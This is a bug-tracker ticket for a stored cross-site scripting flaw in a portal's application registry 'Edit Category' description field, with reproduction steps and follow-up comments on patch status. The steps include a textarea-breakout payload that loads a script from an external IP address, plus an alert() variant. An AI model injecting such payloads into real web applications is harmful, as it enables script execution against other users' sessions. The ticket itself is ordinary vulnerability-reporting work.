Hide Forgot
Help Desk Ticket Reference: https://c.na7.visual.force.com/apex/Case_View?id=500A0000007CtcY&sfdc.override=1 project_key: JBEPP Our application security center of excellence discovered a cross-site scripting vulnerability with the application registry portlet. Here are the steps to reproduce: Steps to Reproduce Exploit: 1. Log in to the application as "Administrators" user role. 2. Click on "Edit Category" button. 3. Type at the "Description" field the following: Dashboard</textarea><script src=\\3.211.64.16\xsrf\a.js></script>. 4. Press on "Save" button. 5. Then click on "Edit Category" button. 6. Finally, the script is executed as proof of the vulnerability
Link: Added: This issue is related to GTNPORTAL-1955
Help Desk Ticket Reference: Added: https://c.na7.visual.force.com/apex/Case_View?id=500A0000007CtcY&sfdc.override=1
Pretty much the same steps in the description of this Jira. I could also reproduce using <script>alert("some string") as showed in step 4. 1. login as root 2. Group -> Administration -> Application Registry 3. Edit Category 4. Type at the "Description" field the following: Dashboard</textarea><script src=\\3.211.64.16\xsrf\a.js> or Dashboard</textarea><script>alert("Bad XSS");</script> 5. Click on Save button. 6. Then click on "Edit Category" button. 7. Finally, the script is executed as proof of the vulnerability
I don't understand, are you saying that the patch doesn't work ?
Release Notes Docs Status: Added: Not Required Release Notes Text: Added: Included in the Release Note for JBEPP-598
I hadn't seen that the case status was Resolved while I was righting my comment, you can probably ignore it. I haven't test with 5.1.1.DEV03 yet, I was just saying that error was happening with the strings "Dashboard</textarea><script src=" and "Dashboard</textarea><script>". Thanks.
Link: Added: This issue is related to JBEPP-1023
Link: Added: This issue is related to JBEPP-365
Re-opening the issue, still present in 5.1.1 GA.
Link: Added: This issue relates to JBEPP-1079
Link: Added: This issue is related to GTNPORTAL-2073
Security: Removed: RHT+eXo Added: Public